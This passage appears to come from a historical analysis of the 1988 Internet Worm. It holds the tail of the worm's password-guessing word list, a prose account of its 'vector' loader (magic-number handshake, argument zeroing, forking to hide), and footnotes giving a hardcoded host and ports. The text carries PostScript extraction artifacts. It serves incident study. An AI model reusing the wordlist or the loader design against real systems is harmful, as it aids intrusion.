vertigo vicky village virginia warren water weenie whatnot whiting whitney will william williamsburg willie winston wisconsinwizardwombat woodwind wormwood yacov yang yellowstone yosemite zap zimmerman Appendix B The Vector Program The worm was brought over to each machine it infected via the actions of a small program I call the vector program. Other individuals have been referring to this as the grappling hook program. Some people have referred to it as the program, since that is the suffix used on each copy. The source for this program would be transferred to the victim machine using one of the methods discussed in the paper. It would then be compiled and invoked on the victim machine with three command line arguments: the canonical IP address of the infecting machine, the number of the TCP port to connect to on that machine to get copies of the main worm files, and a magic number that effectively acted as a one-time-challenge password. If the ``server'' worm on the remote host and port did not receive the same magic number back before starting the transfer, it would immedi- ately disconnect from the vector program. This can only have been to prevent some- one from attempting to ``capture'' the binary files by spoofing a worm ``server.'' This code also goes to some effort to hide itself, both by zeroing out the argu- ment vector, and by immediately forking a copy of itself. If a failure occurred in transferring a file, the code deleted all files it had already transferred, then it exited. One other key item to note in this code is that the vector was designed to be able to transfer up to 20 files; it was used with only three. This can only make one wonder if a more extensive version of the worm was planned for a later date, and if that version might have carried with it other command files, password data, or possibly local virus or trojan horse programs. <<what follows is a pair of programs that I was unable to decode with any dependability>> References: BSD is an acronym for Berkeley Software Distribution. UNIX is a registered trademark of AT&T Laboratories. VAX is a trademark of Digital Equipment Corporation. The second edition of the book, just published, has been ``updated'' to omit this subplot about VIRUS. %%Page: 4 5 5 It is probably a coincidence that the Internet Worm was loosed on November 2, the eve of this ``birthday.'' 6 Note that a widely used alternative to sendmail, MMDF, is also viewed as too complex and large by many users. Further, it is not perceived to be as flexible as sendmail if it is necessary to establish special addressing and handling rules when bridging heterogeneous networks. 7 Strictly speaking, the password is not encrypted. A block of zero bits is repeatedly encrypted using the user password, and the results of this encryption is what is saved. See [Morr79] for more details. 8 Such a list would likely include all words in the dictionary, the reverse of all such words, and a large collection of proper names. 8 rexec is a remote command execution service. It requires that a username/password combination be supplied as part of the request. 9 This was compiled in as port number 23357, on host 127.0.0.1 $loopback$. 10 Using TCP port 11357 on host 128.32.137.13. 11 Interestingly, although the program was coded to get the address of the host on the remote end of point-to-point links, no use seems to have been made of that information. 12 As if some of them aren't suspicious enough! 13 This appears to be a bug. The probable assumption was that the routine hl would handle infection of local hosts, but hl calls this routine! Thus, local hosts were never infected via this route. 14 This is puzzling. The appropriate file to scan for equivalent hosts would have been the .rhosts file, not the .forward file. 15 Private communication from someone present at the meeting. 16 The thought of a Sequent Symmetry or Gould NP1 infected with multiple copies of the worm presents an awesome $and awful$ thought. The effects noticed locally when the worm broke into a mostly unloaded VAX 8800 were spectacular. The effects on a machine with one or two orders of magnitude more capacity is a frightening thought. 17 Developed by Kevin Braunsdorf and Rich Kulawiec at Purdue PUCC. 18 Rick Adams, of the Center for Seismic Studies, has commented that we may someday hear that the worm was loosed to impress Jodie Foster. Without further information, this is as valid a speculation as any other, and should raise further disturbing questions; not everyone with access to computers is rational and sane, and future attacks may reflect this. 19 Throughout this paper I have been writing author$s$ instead of author. It occurs to me that most of the mail, Usenet postings, and media coverage of this incident have assumed that it was author $singular$. Are we so unaccustomed to working together on programs that this is our natural inclination? Or is it that we find it hard to believe that more than one individual could have such poor judgement? I also noted that most of people I spoke with seemed to assume that the worm author was male. I leave it to others to speculate on the value, if any, of these observations.